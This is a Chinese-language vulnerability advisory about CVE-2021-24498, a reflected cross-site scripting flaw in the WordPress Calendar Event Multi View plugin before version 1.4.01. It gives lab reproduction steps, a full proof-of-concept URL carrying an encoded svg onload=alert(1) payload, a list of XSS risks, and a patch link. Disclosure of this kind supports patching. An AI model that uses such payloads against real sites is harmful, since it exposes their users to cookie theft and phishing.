Wordpress|Wordpress Calendar Event Multi View < 1.4.01 反射型xss漏洞(CVE-2021-24498)
简介 WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress 插件是WordPress开源的一个应用插件。
The Calendar Event Multi View WordPress Plugin 存在安全漏洞,该漏洞源于在1.4.01版本之前的此插件在将“start”和“end”GET参数输出到页面之前(通过php edit.php)没有清理或转义它们,导致了一个反映跨站点脚本问题。
影响版本 Calendar Event Multi View < 1.4.01
复现步骤 使用如下
https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24498/vultarget
docker-compose up -d docker-compose run --rm wp-cli install-wp
poc
https://www.example.com/?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22
拼接到url发现触发xss漏洞
文章图片
风险危害 1、钓鱼欺骗:最典型的就是利用目标网站的反射型跨站脚本漏洞将目标网站重定向到钓鱼网站,或者通过注入钓鱼JavaScript脚本以监控目标网站的表单输入,甚至攻击者基于DHTML技术发起更高级的钓鱼攻击。
2、网站挂马:跨站时,攻击者利用Iframe标签嵌入隐藏的恶意网站,将被攻击者定向到恶意网站上、或弹出恶意网站窗口等方式,进行挂马。
3、身份盗用:Cookie是用户对于特定网站的身份验证标志,XSS攻击可以盗取用户的cookie,从而利用该cookie盗取用户对该网站的操作权限。
4、盗取网站用户信息:当窃取到用户cookie从而获取到用户身份时,攻击者可以盗取到用户对网站的操作权限,从而查看用户隐私信息。
5、垃圾信息发送:在社交网站社区中,利用XSS漏洞借用被攻击者的身份发送大量的垃圾信息给特定的目标群。
6、劫持用户Web行为:一些高级的XSS攻击甚至可以劫持用户的Web行为,从而监视用户的浏览历史、发送与接收的数据等等。
7、XSS蠕虫:借助XSS蠕虫病毒还可以用来打广告、刷流量、挂马、恶作剧、破坏数据、实施DDoS攻击等。
排查建议 目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86
【Wordpress|Wordpress Calendar Event Multi View < 1.4.01 反射型xss漏洞(CVE-2021-24498)】------------恢复内容结束------------
推荐阅读
- java编程|CQRS/EventSoucring和Spring结合Axon教程
- 手写
- Wordpress|百度提交网站提示您无权访问该页面,点击确定按钮返回首页,如何解决
- 给|给 SAP BTP 创建的 Java 应用添加 Custom Event Handler 支持创建功能
- fullcalendar日程管理插件next与prev等切换月份回调处理
- Event loop
- js 事件循环 Event Loop
- netty系列之:EventLoop,EventLoopGroup和netty的默认实现
- Spring事件监听器之@EventListener原理分析
- Unity3D_UGUI|UIGU源码分析3 (ExecuteEvents)